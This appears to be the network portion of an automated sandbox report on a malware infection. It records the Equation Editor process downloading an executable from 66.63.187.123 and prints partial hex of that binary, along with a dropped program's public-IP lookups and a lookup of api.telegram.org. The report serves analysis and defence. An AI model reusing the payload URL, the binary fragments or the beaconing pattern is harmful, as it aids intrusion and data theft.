                                              Sep 26, 2024 07:47:32.682720900 CEST8.8.8.8192.168.2.220x8778No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:32.682720900 CEST8.8.8.8192.168.2.220x8778No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:32.682720900 CEST8.8.8.8192.168.2.220x8778No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:32.682720900 CEST8.8.8.8192.168.2.220x8778No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:32.682720900 CEST8.8.8.8192.168.2.220x8778No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:32.708744049 CEST8.8.8.8192.168.2.220x16a0No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 07:47:32.708744049 CEST8.8.8.8192.168.2.220x16a0No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:32.708744049 CEST8.8.8.8192.168.2.220x16a0No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:32.708744049 CEST8.8.8.8192.168.2.220x16a0No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:32.708744049 CEST8.8.8.8192.168.2.220x16a0No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:32.708744049 CEST8.8.8.8192.168.2.220x16a0No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:33.340104103 CEST8.8.8.8192.168.2.220x8b6aNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:33.340104103 CEST8.8.8.8192.168.2.220x8b6aNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:34.048654079 CEST8.8.8.8192.168.2.220x49bfNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 07:47:34.048654079 CEST8.8.8.8192.168.2.220x49bfNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:34.048654079 CEST8.8.8.8192.168.2.220x49bfNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:34.048654079 CEST8.8.8.8192.168.2.220x49bfNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:34.048654079 CEST8.8.8.8192.168.2.220x49bfNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:34.048654079 CEST8.8.8.8192.168.2.220x49bfNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:34.100194931 CEST8.8.8.8192.168.2.220x384aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 07:47:34.100194931 CEST8.8.8.8192.168.2.220x384aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:34.100194931 CEST8.8.8.8192.168.2.220x384aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:34.100194931 CEST8.8.8.8192.168.2.220x384aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:34.100194931 CEST8.8.8.8192.168.2.220x384aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:34.100194931 CEST8.8.8.8192.168.2.220x384aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:38.070183039 CEST8.8.8.8192.168.2.220x7c4dNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:38.070183039 CEST8.8.8.8192.168.2.220x7c4dNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:38.712769985 CEST8.8.8.8192.168.2.220xd27No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 07:47:38.712769985 CEST8.8.8.8192.168.2.220xd27No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:38.712769985 CEST8.8.8.8192.168.2.220xd27No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:38.712769985 CEST8.8.8.8192.168.2.220xd27No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:38.712769985 CEST8.8.8.8192.168.2.220xd27No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:38.712769985 CEST8.8.8.8192.168.2.220xd27No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:38.721246004 CEST8.8.8.8192.168.2.220xcdebNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 07:47:38.721246004 CEST8.8.8.8192.168.2.220xcdebNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:38.721246004 CEST8.8.8.8192.168.2.220xcdebNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:38.721246004 CEST8.8.8.8192.168.2.220xcdebNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:38.721246004 CEST8.8.8.8192.168.2.220xcdebNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:38.721246004 CEST8.8.8.8192.168.2.220xcdebNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:38.727744102 CEST8.8.8.8192.168.2.220xcdebNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 07:47:38.727744102 CEST8.8.8.8192.168.2.220xcdebNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:38.727744102 CEST8.8.8.8192.168.2.220xcdebNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:38.727744102 CEST8.8.8.8192.168.2.220xcdebNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:38.727744102 CEST8.8.8.8192.168.2.220xcdebNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:38.727744102 CEST8.8.8.8192.168.2.220xcdebNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:39.415088892 CEST8.8.8.8192.168.2.220x9683No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:39.415088892 CEST8.8.8.8192.168.2.220x9683No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:40.701773882 CEST8.8.8.8192.168.2.220x932fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 07:47:40.701773882 CEST8.8.8.8192.168.2.220x932fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:40.701773882 CEST8.8.8.8192.168.2.220x932fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:40.701773882 CEST8.8.8.8192.168.2.220x932fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:40.701773882 CEST8.8.8.8192.168.2.220x932fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:40.701773882 CEST8.8.8.8192.168.2.220x932fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:40.710437059 CEST8.8.8.8192.168.2.220xc4a7No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 07:47:40.710437059 CEST8.8.8.8192.168.2.220xc4a7No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:40.710437059 CEST8.8.8.8192.168.2.220xc4a7No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:40.710437059 CEST8.8.8.8192.168.2.220xc4a7No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:40.710437059 CEST8.8.8.8192.168.2.220xc4a7No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:40.710437059 CEST8.8.8.8192.168.2.220xc4a7No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:41.442218065 CEST8.8.8.8192.168.2.220x5171No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:41.442218065 CEST8.8.8.8192.168.2.220x5171No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:42.363111973 CEST8.8.8.8192.168.2.220xee6eNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 07:47:42.363111973 CEST8.8.8.8192.168.2.220xee6eNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:42.363111973 CEST8.8.8.8192.168.2.220xee6eNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:42.363111973 CEST8.8.8.8192.168.2.220xee6eNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:42.363111973 CEST8.8.8.8192.168.2.220xee6eNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:42.363111973 CEST8.8.8.8192.168.2.220xee6eNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:42.373533010 CEST8.8.8.8192.168.2.220x71c3No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 07:47:42.373533010 CEST8.8.8.8192.168.2.220x71c3No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:42.373533010 CEST8.8.8.8192.168.2.220x71c3No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:42.373533010 CEST8.8.8.8192.168.2.220x71c3No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:42.373533010 CEST8.8.8.8192.168.2.220x71c3No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:42.373533010 CEST8.8.8.8192.168.2.220x71c3No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:42.854585886 CEST8.8.8.8192.168.2.220x7a15No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:42.854585886 CEST8.8.8.8192.168.2.220x7a15No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 07:47:43.625776052 CEST8.8.8.8192.168.2.220x3f63No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • reallyfreegeoip.org
                                              • api.telegram.org
                                              • 66.63.187.123
                                              • checkip.dyndns.org

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.224916166.63.187.123803360C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 07:47:18.544132948 CEST321OUTGET /txt/LLnsOpxxAnmWi.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: 66.63.187.123
                                              Connection: Keep-Alive
                                              Sep 26, 2024 07:47:20.411302090 CEST1236INHTTP/1.1 200 OK
                                              Server: nginx/1.26.2
                                              Date: Thu, 26 Sep 2024 05:47:20 GMT
                                              Content-Type: application/x-msdos-program
                                              Content-Length: 704000
                                              Connection: keep-alive
                                              Last-Modified: Thu, 26 Sep 2024 03:29:52 GMT
                                              ETag: "abe00-622fd59ffb286"
                                              Accept-Ranges: bytes
                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a1 d4 f4 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 98 0a 00 00 24 00 00 00 00 00 00 76 b6 0a 00 00 20 00 00 00 c0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 b6 0a 00 4f 00 00 00 00 c0 0a 00 ac 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf0$v @ @$O H.text| `.rsrc "@@.reloc@BXHY\5,&0|((}{(}(}(}(}(}(}(}*0!( lY mZ(X+*0ms} }#cA} ig}#c} 's}s}}}((8>%,os{{(}
                                              Sep 26, 2024 07:47:20.411328077 CEST224INData Raw: 7b 03 00 00 04 02 7b 0b 00 00 04 28 20 00 00 0a 7d 0b 00 00 04 02 08 7b 01 00 00 04 02 7b 0c 00 00 04 28 21 00 00 0a 7d 0c 00 00 04 02 08 7b 03 00 00 04 02 7b 0d 00 00 04 28 22 00 00 0a 7d 0d 00 00 04 02 02 7b 0e 00 00 04 08 7b 08 00 00 04 28 23
                                              Data Ascii: {{( }{{(!}{{("}{{(#-{+{}{{($-{+{}{{o%Xi:*0#$@Yl#$@(&
                                              Sep 26, 2024 07:47:20.411339045 CEST1236INData Raw: 00 00 0a 28 27 00 00 0a 28 28 00 00 0a 69 7d 10 00 00 04 02 23 00 00 00 00 00 00 24 40 0e 05 0e 04 59 6c 23 00 00 00 00 00 00 24 40 28 26 00 00 0a 28 27 00 00 0a 28 28 00 00 0a 69 7d 11 00 00 04 16 0a 2b 57 00 06 20 90 01 00 00 5a 6b 05 04 59 6b
                                              Data Ascii: ('((i}#$@Yl#$@(&('((i}+W ZkYk[l{],()+(*k"k"Co+{k" A[i(!XY-s,8 ZkYk[l{],()+(*"k"Ck
                                              Sep 26, 2024 07:47:20.411345959 CEST1236INData Raw: 09 00 00 04 6f 39 00 00 0a 11 17 6f 3a 00 00 0a 7b 04 00 00 04 09 59 23 00 00 00 00 00 00 79 40 5a 11 04 5b 13 19 02 7b 09 00 00 04 6f 39 00 00 0a 11 17 6f 3a 00 00 0a 7b 05 00 00 04 09 59 23 00 00 00 00 00 00 79 40 5a 11 04 5b 13 1a 02 7b 09 00
                                              Data Ascii: o9o:{Y#y@Z[{o9o:{Y#y@Z[{o9o:{Y#y@Z[{o9o:{Y#y@Z[1(A+(=kkkko+,,(B#@[Ykkk
                                              Sep 26, 2024 07:47:20.411355972 CEST1236INData Raw: 00 00 13 30 02 00 2b 00 00 00 0b 00 00 11 00 03 2c 0b 02 7b 12 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 12 00 00 04 6f 4f 00 00 0a 00 00 02 03 28 52 00 00 0a 00 2a 00 13 30 05 00 a4 00 00 00 0c 00 00 11 00 d0 04 00 00 02 28 53 00 00 0a 73
                                              Data Ascii: 0+,{+,{oO(R*0(SsT(U"A"AsV(W(X ~ sY(Zrpo[tQ(\(]s^(_rp(`r#po3(a(b*0[
                                              Sep 26, 2024 07:47:20.411366940 CEST1236INData Raw: 0a 17 58 02 7b 2e 00 00 04 6f 72 00 00 0a 28 73 00 00 0a 73 1c 00 00 0a 28 02 00 00 06 7d 1b 00 00 04 02 02 7b 13 00 00 04 02 7b 1a 00 00 04 02 7b 1b 00 00 04 6f 09 00 00 06 7d 1c 00 00 04 02 02 7b 13 00 00 04 02 7b 1a 00 00 04 02 7b 1b 00 00 04
                                              Data Ascii: X{.or(ss(}{{{o}{{{o}{"4B{o|Yko}{"?"o~{{{{{o}{,(x{oo{5o
                                              Sep 26, 2024 07:47:20.411375999 CEST896INData Raw: 00 00 0a 00 02 7b 3a 00 00 04 6f 8b 00 00 0a 00 02 7b 3b 00 00 04 6f 8b 00 00 0a 00 02 28 55 00 00 0a 00 02 7b 21 00 00 04 18 6f 8c 00 00 0a 00 02 7b 21 00 00 04 16 20 1a 04 00 00 73 30 00 00 0a 6f 31 00 00 0a 00 02 7b 21 00 00 04 1c 16 1c 16 73
                                              Data Ascii: {:o{;o(U{!o{! s0o1{!s^o{!rGpo`{! sYo{!o{"o{" Gs0o1{"s^o{"rUpo`{" sYo
                                              Sep 26, 2024 07:47:20.411396027 CEST1236INData Raw: 18 72 ff 00 00 70 a2 25 19 72 0b 01 00 70 a2 25 1a 72 17 01 00 70 a2 25 1b 72 1f 01 00 70 a2 25 1c 72 29 01 00 70 a2 25 1d 72 33 01 00 70 a2 25 1e 72 41 01 00 70 a2 25 1f 09 72 55 01 00 70 a2 25 1f 0a 72 65 01 00 70 a2 25 1f 0b 72 77 01 00 70 a2
                                              Data Ascii: rp%rp%rp%rp%r)p%r3p%rAp%rUp%rep%rwpo{' s0o1{'s^o{'rpo`{' 'sYo{'o{'smoo{(o{( us0
                                              Sep 26, 2024 07:47:20.411406994 CEST1236INData Raw: 04 1f 41 1f 20 73 59 00 00 0a 6f 8e 00 00 0a 00 02 7b 2d 00 00 04 1f 12 6f 8f 00 00 0a 00 02 7b 2d 00 00 04 72 d5 00 00 70 6f 33 00 00 0a 00 02 7b 2e 00 00 04 20 8c 03 00 00 20 9c 04 00 00 73 30 00 00 0a 6f 31 00 00 0a 00 02 7b 2e 00 00 04 1c 1c
                                              Data Ascii: A sYo{-o{-rpo3{. s0o1{.s^o{.C%soh{.C%sog{.rpo`{.l&sYo{.o{.C%soi{/o
                                              Sep 26, 2024 07:47:20.411417007 CEST448INData Raw: 00 00 04 1f 1b 6f 8f 00 00 0a 00 02 7b 35 00 00 04 72 33 03 00 70 6f 33 00 00 0a 00 02 7b 35 00 00 04 17 6f 95 00 00 0a 00 02 7b 35 00 00 04 02 fe 06 11 00 00 06 73 6d 00 00 0a 6f 99 00 00 0a 00 02 7b 36 00 00 04 17 6f 90 00 00 0a 00 02 7b 36 00
                                              Data Ascii: o{5r3po3{5o{5smo{6o{6@o{6(o{6 os0o1{6s^o{6r9po`{6U$sYo{6o{6rCpo3{6o{6
                                              Sep 26, 2024 07:47:20.416254044 CEST1236INData Raw: 00 06 73 6d 00 00 0a 6f 99 00 00 0a 00 02 7b 38 00 00 04 17 6f 90 00 00 0a 00 02 7b 38 00 00 04 20 60 01 00 00 20 de 04 00 00 73 30 00 00 0a 6f 31 00 00 0a 00 02 7b 38 00 00 04 1c 16 1c 16 73 5e 00 00 0a 6f 8d 00 00 0a 00 02 7b 38 00 00 04 72 59
                                              Data Ascii: smo{8o{8 ` s0o1{8s^o{8rYpo`{8 sYo{8o{8ripo3{9 < s0o1{9s^o{9C%sog{9r}po`{9


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.2249162132.226.8.169803616C:\Users\user\AppData\Roaming\vvndewepeter91026.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 07:47:26.046339035 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 07:47:27.507050991 CEST272INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 05:47:27 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Sep 26, 2024 07:47:27.532164097 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Sep 26, 2024 07:47:27.915045977 CEST272INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 05:47:27 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Sep 26, 2024 07:47:28.133984089 CEST272INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 05:47:27 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Sep 26, 2024 07:47:30.296354055 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Sep 26, 2024 07:47:30.613368034 CEST272INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 05:47:30 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Sep 26, 2024 07:47:30.825961113 CEST272INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 05:47:30 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.2249165193.122.6.168803616C:\Users\user\AppData\Roaming\vvndewepeter91026.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 07:47:31.376486063 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Sep 26, 2024 07:47:32.016647100 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 05:47:31 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: f2b7de12d9c1c6fb0f9ee6e65847ce35
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.2249167158.101.44.242803616C:\Users\user\AppData\Roaming\vvndewepeter91026.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 07:47:32.716286898 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Sep 26, 2024 07:47:33.318691969 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 05:47:33 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: e0e86c00809d52cf9401875964973f6c
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
